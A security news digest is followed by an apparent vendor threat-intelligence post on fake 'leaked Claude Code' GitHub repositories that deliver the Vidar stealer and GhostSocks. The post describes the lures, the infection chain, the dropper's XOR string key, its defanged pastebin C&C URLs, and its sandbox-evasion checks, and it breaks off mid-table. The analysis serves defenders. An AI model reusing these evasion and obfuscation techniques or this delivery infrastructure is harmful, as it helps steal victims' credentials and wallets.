governance AI agents are executing consequential tasks autonomously, often across multiple systems and with little record of what they did or why. Asqav, a Python SDK released under the MIT license, addresses that gap by attaching a cryptographic signature to each agent action and linking entries into a hash chain.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AI agent intent is a starting point, not a security strategy In this Help Net Security interview, Itamar Apelblat, CEO of Token Security, walks through findings from the company's research, which shows that 65% of agentic chatbots have never been used yet still hold live access credentials. He explains why organizations treat AI agents more like quick experiments than governed identities, and why that creates risks similar to orphaned service accounts, only harder to see.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Health insurance lead sites sell personal data within seconds of form submission Lead generation websites that offer health insurance quotes collect sensitive personal data and sell it to multiple buyers within seconds of a user clicking submit. A study by researchers at UC Davis, Stanford University, and Maastricht University mapped this process across 105 health insurance lead generation sites and monitored what happened to the data over 60 days.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vibe hunting gets right about AI threat hunting, and where it breaks down In this Help Net Security interview, Aqsa Taylor, Chief Security Evangelist, Exaforce, explains vibe hunting, an AI-driven approach to threat detection that inverts traditional hypothesis-driven methods.Instead of analysts defining attack vectors upfront, the AI scans datasets for anomalous patterns and surfaces potential threats.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Little Snitch for Linux shows what your apps are connecting to Network monitoring on Linux has long been a gap for users who want per- process visibility into outbound connections. Existing tools either operate at the command line or were designed for server security rather than desktop privacy. Objective Development, the Austrian company behind the macOS firewall utility Little Snitch, released a Linux version of the tool. It is free and, according to the company, will remain so.</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counter cookie theft, Chrome ships device-bound session credentials Cookie theft follows a well-established pattern. Infostealer malware infiltrates a device, extracts authentication cookies, and exfiltrates them to an attacker-controlled server. Because cookies often have extended lifetimes, attackers can access accounts without passwords, then bundle and sell the stolen credentials. Once malware gains access to a machine, it can read the local files and memory where browsers store authentication cookies.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Social engineering attacks on open source developers are escalating North Korean hackers spent weeks socially engineering an Axios maintainer through a fake Slack workspace, a cloned company identity, and a fabricated Microsoft Teams call that tricked him into installing a RAT posings as a software update. They used the access they gained to inject malware into npm packages downloaded 100+ million times a week.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BlueHammer: Windows zero-day exploit leaked A buggy but functional proof-of-concept (PoC) exploit for an unpatched Windows local privilege escalation vulnerability dubbed BlueHammer has been published on GitHub by someone who goes by the handle Chaotic Eclipse and Nightmare Eclipse.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Acrobat Reader zero-day exploited in the wild for many months Unknown attackers have exploited a zero-day Adobe Acrobat Reader vulnerability since November 2025 and possibly even earlier, security researcher Haifei Li has discovered.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Claude helps researcher dig up decade-old Apache ActiveMQ RCE vulnerability (CVE-2026-34197) In the latest demonstration of how AI assistants can help with bug hunting, Horizon3.ai researcher Naveen Sunkavally used Claude to unearth CVE-2026-34197, a remote code execution vulnerability in Apache ActiveMQ that's been introduced in the codebase 13 years ago.</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Poisoned "Office 365" search results lead to stolen paychecks A financially motivated hacking group is targeting Canadian employees with a sophisticated campaign designed to covertly redirect their salary payments into attacker-controlled bank accounts, Microsoft researchers discovered.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How Mimecast brings enterprise-grade email protection to API deployment In this Help Net Security video, Andrew Williams, Senior Product Manager at Mimecast, walks through the company's API-based email security protection for Microsoft 365 and Google Workspace environments.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April 2026 Patch Tuesday forecast: Spring-cleaning of a preview The first quarter of the year has already passed. Recent discussions on AI and its risks underscore the importance of human oversight. AI can deliver value in many situations, but it can still reach incorrect conclusions even with complete information. For now, the approach remains trust but verify.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talent looks the other way as wireless security incidents pile up Enterprise wireless networks are supporting a growing mix of devices and applications, increasing operational demand and security exposure. The 2026 Cisco State of Wireless report reflects these conditions through rising incident rates, higher costs, and ongoing staffing challenges.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Residential proxies make a mockery of IP-based defenses Attack traffic moved through ordinary home and mobile connections in ways that limited the usefulness of IP reputation on its own. GreyNoise observed 4 billion malicious sessions during a 90-day period and described activity that appeared indistinguishable from normal user traffic at the network level.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OpenAI opens applications for an external AI safety research fellowship OpenAI is accepting applications for a paid fellowship program that will fund external researchers to work on safety and alignment questions related to advanced AI systems. The program, called the OpenAI Safety Fellowship, runs from September 14, 2026 through February 5, 2027. Applications close May 3, with successful applicants notified by July 25.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Russian hackers hijack internet traffic using vulnerable routers The Russian state cyber group APT28 has been compromising routers to hijack web traffic and spy on victims, the UK's The National Cyber Security Centre (NCSC) has warned. Attackers are exploiting vulnerable routers to alter DHCP and DNS settings, redirecting traffic through servers they control.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Cybercrime losses break the $20 billion mark Online crime continues to generate rising financial losses, with totals reaching $20.877 billion in 2025. The FBI's Internet Crime Complaint Center (IC3) report shows a 26% increase in total reported losses from the previous year. More than one million complaints were submitted during the year, with fraud accounting for the majority of losses. Cyber-enabled fraud totaled $17.7 billion, representing 85% of all reported financial damage.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Cybercriminals move deeper into networks, hiding in edge infrastructure Attack activity is moving toward infrastructure outside endpoint visibility. Proxy networks support a wide range of operations, edge devices serve as initial access points, and GenAI speeds up how attackers assemble and rebuild their tooling. Lumen's 2026 Threatscape Report describes this pattern in criminal and nation-state activity.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OpenSSL 3.6.2 lands with eight CVE fixes OpenSSL 3.6.2 patches eight CVEs across a range of components. The project rates the most severe issue in the release as Moderate. The release fixes incorrect failure handling in RSA KEM RSASVE encapsulation (CVE-2026-31790) and a loss of key agreement group tuple structure when the DEFAULT keyword is used in server-side configuration of the key-agreement group list (CVE- 2026-2673).</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Prompt injection tags along as GenAI enters daily government use Routine use of GenAI has moved into daily operations in state and territorial government environments, placing new security risks within common workflows. A Center for Internet Security (CIS) report, Prompt Injections: The Inherent Threat to Generative AI, identifies prompt injection as a persistent concern tied to that adoption.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Phishers sneak through using GitHub and Jira's own mail delivery infrastructure Attackers are abusing the notification systems of SaaS platforms like GitHub and Jira to send phishing and spam emails, Cisco Talos researchers are warning. On GitHub, the attackers are abusing the service's notification system to deliver malicious payloads.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WhatsApp brings long-awaited privacy feature to filter who can reach you After years of waiting, WhatsApp is set to roll out a username feature that will allow people to connect and communicate without sharing their phone numbers. This means more privacy and better control over phone number visibility by choosing a unique username.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113,000 explicit prompts from AI girlfriend platform exposed, many linked to user IDs MyLovely.AI, an AI girlfriend platform, suffered a data breach that exposed over 100,000 users. MyLovely.AI allows people to create personalized not safe for work (NSFW) content and engage in real-time conversations with AI-generated companions, often involving highly personal prompts and interactions.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CISOs grapple with AI demands within flat budgets Security spending continues to edge upward across large organizations, though the changes remain gradual and tightly managed. The 2026 RH-ISAC CISO Benchmark reflects a steady environment where budgets expand in small steps, even as AI becomes a routine part of security operations.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Product showcase: Proton Authenticator is an end-to-end encrypted, open source 2FA app Proton Authenticator is a free and open-source two-factor authentication (2FA) app that generates time-based one-time passwords (TOTP) to help secure online accounts. It is available on Windows, macOS, Linux, iOS, and Android, allowing users to access their verification codes across devices.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Google study finds LLMs are embedded at every stage of abuse detection Online platforms are running large language models at every stage of LLM content moderation, from generating training data to auditing their own systems for bias. Researchers at Google mapped how this is happening across what the authors call the Abuse Detection Lifecycle, a four-stage framework covering labeling, detection, review and appeals, and auditing.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Comp AI: The open-source way to get compliant with SOC 2, ISO 27001, HIPAA and GDPR Getting a startup through a SOC 2 audit has long meant months of manual evidence collection, policy writing, and repeated back-and-forth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>with auditors. A growing number of compliance platforms have moved to automate parts of that process, and Comp AI is now doing it with an open-source codebase that organizations can inspect, modify, and self-host.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GitHub Copilot CLI gets a second-opinion feature built on cross-model review Coding agents make decisions in sequence: a plan is drafted, implemented, then tested. Any error introduced early compounds as subsequent steps build on the same flawed assumption. Self-reflection is a recognized mitigation technique, and one GitHub Copilot already supports, but a model reviewing its own output is still constrained by the same training data and blind spots that produced it.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AI-enabled device code phishing campaign exploits OAuth flow for account takeover A phishing campaign that bypasses the standard 15-minute expiration window through automation and dynamic code generation, leveraging the OAuth Device Code Authentication flow to compromise organizational accounts at scale, has been observed by the Microsoft Defender Security Research team. The campaign uses AI-assisted infrastructure and end-to-end automation.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Anthropic's new AI model finds and exploits zero-days across every major OS and browser Automated vulnerability discovery tools have existed for decades, and the gap between finding a bug and building a working exploit has always slowed attackers. That gap is now substantially narrower. Anthropic's Claude Mythos Preview, a new general-purpose language model being made available only to a limited group of critical industry partners and open source developers, can autonomously identify zero-day vulnerabilities and then construct working exploits across every major operating system and major web browser.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Flatpak 1.16.4 fixes sandbox escape and three other security flaws Flatpak, a Linux application sandboxing and distribution framework, released version 1.16.4, patching four security vulnerabilities. The most severe fix addresses a complete sandbox escape that leads to host file access and code execution in the host context, tracked as CVE-2026-34078.</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Iranian cyber activity hits US energy, water, and government networks U.S. government agencies on Tuesday warned American organizations about ongoing cyber activity targeting OT and PLC devices, including those manufactured by Rockwell Automation and Allen-Bradley, across multiple critical infrastructure sectors. The activity has been attributed to Iranian-affiliated APT actors seeking to disrupt operations in the United States.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Meta's Muse Spark takes AI a step closer to personal superintelligence Meta Superintelligence Labs has introduced Muse Spark, a natively multimodal reasoning model with support for tool use, visual chain of thought, and multi-agent orchestration. The release includes a Contemplating mode, which is rolling out gradually and orchestrates multiple agents that reason in parallel.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Claude Managed Agents bring execution and control to AI agent workflows Anthropic's Claude Managed Agents are a suite of composable APIs for building and deploying cloud-hosted agents at scale, handling sandboxed code execution, checkpointing, credential management, scoped permissions, and end-to-end tracing for you.</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Product showcase: Session, a messenger without phone numbers or metadata Instant messaging has been around for decades, but it became widely adopted with the emergence of smartphones. Earlier, communication was limited to basic text messages. Messaging expanded to include photos, videos, and video calls without relying on telecom networks, as long as there is a reliable data connection.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Gmail's end-to-end encryption comes to mobile, no extra apps required Google has expanded Gmail client-side encryption to Android and iOS devices, allowing users to engage with their organization's most sensitive data on mobile devices while ensuring data remains compliant with sovereignty and compliance requirements. This feature is available for Enterprise Plus users with the Assured Controls or Assured Controls Plus add-on.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Cybersecurity jobs available right now: April 8, 2026 We've scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now.</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New infosec products of the week: April 10, 2026 Here's a look at the most interesting products from the past week, featuring releases from Advenica, Intruder, Mallory, and Secureframe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Help Net Security 2026.04.12 11:42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.helpnetsecurity.com/2026/04/12/week-in-review-windows-zero-day-exploit-leaked-patch-tuesday-forecast/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Weaponizing Trust Signals: Claude Code Lures and GitHub Release Payloads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packaging error in Anthropic's Claude Code npm release briefly exposed internal source code. This entry examines how threat actors rapidly weaponized the resulting attention, pivoting an existing AI-themed campaign to spread Vidar and GhostSocks.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Jacob Santos, Sophia Nilette Robles, Jeffrey Francis Bonaobra Apr 03, 2026</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Key takeaways Anthropic inadvertently exposed internal Claude Code source material via a misconfigured npm package, which included approximately 512,000 lines of internal TypeScript and triggering rapid mirroring across </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GitHub.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Within 24 hours, threat actors took advantage of the attention around the leak, to distribute Vidar stealer and GhostSocks proxy malware through fake "leaked Claude Code" GitHub repositories.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Claude Code bait is part of a broader rotating lure operation active since February 2026, impersonating more than 25 software brands while delivering the same Rust-compiled infostealer payload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The campaign abuses GitHub Releases as a trusted malware delivery channel, using large trojanized archives and disposable accounts to repeatedly evade takedowns.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Beyond serving as a lure, the leaked source code itself introduces longer- term risks including vulnerability discovery, prompt injection blueprinting, and agentic attack surface exposure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations should only approve designated installation paths for AI developer tools and should actively detect and block malicious indicators. Organizations should also consider applying governance as a control plane for agentic risk. This incident signifies that security compromise doesn't always come from software vulnerabilities: it can also come from human and organizational gaps. That's why TrendAITM is introducing Agentic Governance Gateway to empower organizations to discover, observe, understand, detect, and enforce governance over agentic AI behaviors to ensure safe and reliable adoption of autonomous AI.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>TrendAI Vision OneTM detects and blocks the indicators of compromise (IOCs) outlined in this blog, and provides customers with tailored threat hunting queries, threat insights, and intelligence reports related. Customers can also leverage Observed Attack Techniques (OAT) to hunt for suspicious activity associated with this threat, and are protected by advanced pattern, behavior-monitoring, and signature-based detections.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late March 2026, Anthropic inadvertently released the internal Claude Code source material as part of an npm package that included a large internal source map file. Although the incident stemmed from a simple packaging mistake, threat actors were quick to capitalize on the resulting attention. Only 24 hours after the leak, they were able to create fake GitHub repositories to distribute credential-stealing malware disguised as "leaked" Claude Code downloads.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incident demonstrates that security compromise is not limited to software vulnerabilities: human factors and organizational control gaps often serve as catalyst for threats and are primary drivers of material impact. In this blog entry, we will talk about our analysis of the threats capitalizing on this incident, the downstream risks of the leaked source code, and the actions organizations should take next. The Claude Code source leak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 March 31, 2026, a routine npm publish for Anthropic's @anthropic- ai/claude-code package (version 2.1.88) inadvertently included a file that should never have shipped: cli.js.map, a 59.8 MB JavaScript source map generated by the Bun bundler. This file's embedded sourcesContent field exposed the complete original TypeScript source tree- approximately 512,000 lines of code across 1,900 files-corresponding to build artifacts hosted on a publicly accessible Cloudflare R2 storage bucket.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exposure was not a sophisticated breach, but a packaging error. The project's .npmignore file failed to exclude .map files from the distribution. Because Bun generates full source maps by default, without an explicit exclusion rule, the entire agentic harness powering Claude Code was also shipped out and laid bare to anyone who ran npm install.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Within hours, the leaked source was mirrored across thousands of GitHub repositories. Anthropic confirmed the incident stemmed from human error, pulled the affected package version, and issued DMCA takedown notices against the mirrors. The company assured that no customer data or credentials were exposed.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marked the second major Anthropic source-exposure incident in two months, following the "Mythos" leak, which also happened late-March and revealed internal details about an unreleased powerful AI model intended for cybersecurity use cases. Attack timeline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Before this leak, threat actors have been running AI-themed malware lures since at least February 2026, cycling through fake tools and repositories to attract developer interest. The Claude Code source leak on March 31 provided a convenient lure, a high-profile and timely lure. This enabled operators to rapidly repurpose their already existing infrastructure. By April 1, within 24 hours of the leak, they pivoted to impersonating "leaked" Claude Code downloads, using the incident's visibility to accelerate distribution of their infostealer payloads.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Date Incident Description Key details February 2026 AI tool lures Malware campaign using fake AI tools TradeAI.exe 18+ unique samples Copilot, Cursor, AI tools Active campaign March 31, 2026 Source code leak Accidental exposure of source code Anthropic npm packaging error 59.8 MB source map exposed 512K lines TypeScript March 31 to April 1, 2026 Time window Delay between leak and weaponization Within 24 hours of the leak April 1, 2026 Claude Code lure Malware distribution under fake Claude tooling ClaudeCode_x64.7z ClaudeCode_x64.exe Vidar v18.7 + GhostSocks GitHub Releases delivery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 The campaign timeline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the source code revealed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leaked codebase exposed several unreleased features and internal mechanisms: KAIROS: A persistent, always-running autonomous daemon mode enabling Claude Code to operate as a background agent that proactively acts on things it notices, with a 15-second blocking budget per cycle.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Undercover Mode:A module (undercover.ts) that prevents the AI from accidentally revealing internal information, such as internal model codenames and Anthropic internals, when staff contribute to public repositories.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Dream System: A background memory-consolidation erngine (autoDream) that runs a reflective pass over project-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>specific memory files during idle periods via a forked subagent, reorganizing and optimizing stored context. Anti-Distillation: Protective mechanisms (ANTI_DISTILLATION_CC) that inject fake tool definitions and apply cryptographic signatures to prevent competitors from training on API traffic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Model codenames: References to upcoming models, including Capybara (a new model with a 1M context window), Fennec (Opus 4.6), and Tengu (the project's internal codename). The source also references Opus 4.7 and Sonnet 4.8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Buddy Pet: A hidden Tamagotchi-style pet system with a deterministic gacha mechanic spanning 18 species, five RPG-like stats (i.e., debugging, patience, chaos, wisdom, and snark) and 1% shiny variants that respond to user coding activity.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Claude Code: One lure in a larger campaign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Threat actors did not need the source code itself. They needed the hype.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Within 24 hours of the leak making headlines, malicious GitHub repositories began appearing in search results-and near the top of Google results-for queries like "leaked Claude Code source" and "Claude Code download." These repositories relied on familiar social engineering tactics, including READMEs promising "leaked source code" and "unlocked enterprise features," fake download buttons embedded as images, and GitHub Releases hosting trojanized 7z archives.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Claude Code bait, however, was only the latest chapter in a much broader operation. Similar GitHub-hosted lure campaigns earlier this year abused fake AI tooling repositories to distribute Vidar-class infostealers and GhostSocks proxy malware, as previously documented by Huntress. Our observation reveals that it's likely that the same threat actors have been running a rotating-lure campaign since dating back to February 2026, cycling through more than 25 distinct software brands to attract victims. Regardless of the name on the label or the branding, every archive delivers the same thing: a Rust-compiled dropper, TradeAI.exe, which deploys Vidar stealer alongside the GhostSocks proxy malware. A rotating carousel of lures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operation's scale becomes apparent when examining the parent archives that contain the TradeAI.exe payload. Across 22 unique payload variants, we identified 38 distinct 7z archives-each branded as a different piece of popular software.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lure themes fall into several categories that reveal the operators' targeting strategy: AI and LLM tools make up the largest cluster, capitalizing on the surge of interest in generative AI. The campaign impersonates well-known names like Claude Code itself (packaged as ClaudeCode_x64.7z and claude-cowork-win- x64.7z), references to specific model versions (opus-4-6-x64.7z), and GitHub Copilot (CopilotCowork_x64.7z). It also mimics lesser-known or fictional AI brands, namely KawaiiGPT_x64.7z, WormGPT_x64.7z, NemoClaw_x64.7z (styled as an NVIDIA product), SimpleClaw_x64.7z, clawdbot_x64.7z, nanobot_x64.7z, and OpenClaw_x64.7z. The naming is deliberate to entice victims, wherein some sound like legitimate open- source projects, while others like "WormGPT" exploit curiosity around underground AI tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cryptocurrency and trading tools form the second major theme. Archives named hyperliquid-bot_x64.7z and bbg_free_x64.7z (mimicking Bloomberg Terminal) target the finance and crypto community, which is a demographic with high-value credentials and wallet data that makes them attractive target for infostealer campaigns.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Creative and media tools round out the lure portfolio. The operators impersonate voice modification software (voicemod_x64.7z), AI video generation tools (seedance_x64.7z, LTX-2.3_x64.7z, SoraRemover_x64.7z), and image generation tools (Z_image_x64.7z). These lures target content creators and artists who may be less security-conscious about software sourced from GitHub.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Utility software provides additional coverage, with lures masquerading asYouTube_Downloader_x64.7z, OrcaSlicer_x64.7z (a 3D printing slicer), iRemovalPro_x64.7z (an iPhone unlocking tool), and perplexity_computer_x64.7z (impersonating the Perplexity AI search assistant). Each targets a different user demographic, broadening the campaign's reach.</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One pattern is consistent across all lures: a throwaway GitHub account creates a repository with a plausible name, populates it with a minimal README, and hosts a trojanized 7z archive as a GitHub Release asset. The archives range from 78 to 167 MBlarge enough to appear legitimate and to evade some automated scanning systems. Once a repository is flagged and removed, the operators simply create a new account and repeat the process with a different lure name. Confirmed distribution repositories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Upon scanning for GitHub lures, our scanner identified 104 repositories created within seven days of the Claude Code leak using related keywords. Of these, two were confirmed to distribute malicious payloads via GitHub</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Releases: leaked-claude-code/leaked-claude-code: distributes ClaudeCode_x64.7z my3jie/leaked-claude-code: repository-based delivery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network data confirmed six additional GitHub distribution URLs used by the broader campaign before the Claude Code pivot: github[.]com/Kawaii-GPT-ai/KawaiiGPT/releases/: KawaiiGPT lure github[.]com/ai-wormGPT/wormGPT/releases/: WormGPT lure github[.]com/claude-ai-opus-4-6/claude-opus-4.6/releases/: Claude Opus 4.6 lure github[.]com/realtime-voice-changer-app/realtime-voice-changer/releases/: Voicemod lure github[.]com/LTX-desktop/LTX-2.3/releases/: LTX video editor lure github[.]com/nvidia-nemoclaw/NemoClaw/releases/: NVIDIA NemoClaw lure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Known threat actor accounts include idbzoomh (taken down by GitHub), idbzoomh1, and my3jie. The accounts are disposable, as operators demonstrate no attachment to any single identity or lure theme.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Infection chain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infection chain is consistent across all lure variants: Discovery: The victim searches for a trending software tool on Google or GitHub. For the Claude Code variant, queries like "leaked Claude Code source" and "Claude Code download" surface the malicious repositories. Lure: The victim lands on a convincing GitHub repository with a README promising free access, leaked features, or cracked versions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Download: The victim downloads a 7z archive (78-167 MB) from GitHub Releases. The archive name matches the lure theme.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Extraction: Inside the archive is TradeAI.exe, a Rust-compiled dropper binary. In the Claude Code variants, the executable is renamed to ClaudeCode_x64.exe or similar.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Execution: The dropper deploys two payloads: Vidar Stealer (v18.7): An information stealer performing multi-threaded data theft of browser credentials, cryptocurrency wallets, session tokens, and system information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>GhostSocks: A SOCKS5 proxy tool that tunnels network traffic through the victim's machine, enabling the operators to use compromised hosts as residential proxies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>C&amp;C resolution: Vidar uses dead drop resolvers, which are a Steam Community profile and a Telegram channel,to retrieve the active C&amp;C address, making infrastructure takedowns more difficult.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exfiltration: Stolen data is packaged and sent to the Vidar C&amp;C server.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Technical analysis of the dropper payload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the delivery method established, we focused on the malware itself. Static analysis of the Rust-compiled dropper distributed across the campaign's lure archives shows that, regardless of branding, the payload remains fundamentally the same. Although it appears under multiple filenames, such as ClaudeCode_x64.exe, TradeAI.exe, and other brand-name variants, the underlying binary is functionally identical across samples. It is a purpose-built loader that masquerades as a graphics driver updater and relies on XOR-encrypted strings with a 12-byte rotating key to conceal C&amp;C URLs, staging paths, and exfiltration endpoints.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Before executing any payload logic, the dropper implements anti-analysis checks. It, enumerates the local environment against hardcoded sandbox usernames, hostnames, processes, and bot farm patterns, terminating silently if an analysis environment is detected. This evasion strategy, combined with Rust compilation, which produces binaries inherently harder to reverse-engineer, contributes to the campaign's persistently low detection rates across vendors. String encryption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All sensitive strings in the binary are encrypted using a simple XOR cipher with a 12-byte rotating key. At runtime, the malware attempts to load the decryption key from the environment variable cryptify_keyd3d ; if the variable is not set, it falls back to the hardcoded default xnasff3wcedj.</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use of an environment variable (cryptify_keyd3d) for the XOR key suggests some flexibility, as it enables the malware author to deploy variants with different keys or allow operators to customize decryption without recompiling.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uses the following decryption routine: Checks environment variable cryptify_keyd3d for custom key Defaults to hardcoded xnasff3wcedj (12 bytes) XOR each byte of the ciphertext with the key byte at index % 12 Returns the resulting UTF-8 string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Listed here are the decrypted C&amp;C URLs: Primary driver list URL: hxxps[://]pastebin[.]com/raw/mcwWi1Ue Backup driver list URL: hxxps[://]snippet[.]host/efguhk/raw Entry point and anti-analysis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malware's entry point immediately establishes stealth by hiding the console window through a sequence of API calls: GetConsoleWindow(), ShowWindow(SW_HIDE), and FreeConsole(). This prevents users from noticing the command window that would otherwise appear during execution.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Following initialization, command-line arguments are parsed to determine the execution path. The malware supports multiple modes including "gui- only" for displaying just the fake installer, "no-gui-at" for background- only operation, and "runas-elevated" for administrative execution.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malware supports several command-line arguments to control execution behavior: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Argument Purpose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--gui-only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Display GUI interface only (driver updater facade)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--no-gui</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Run downloader without GUI (silent background mode)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--elevated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Post-UAC execution path (called after privilege escalation)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--attempt=driver-update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Retry counter for elevation attempts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2. Accepted command-line arguments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Anti-analysis checks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Before executing its payload, the dropper evaluates its environment for signs of sandboxing, virtualization, or analysis. If these are detected detected, it terminates silently to avoid exposure. Virtual machine detection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anti-analysis function implements multi-layered VM detection checking registry keys, processes, drivers, hardware identifiers, and network configuration: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Technique Method Indicators checked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Registry Keys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RegOpenKeyExW 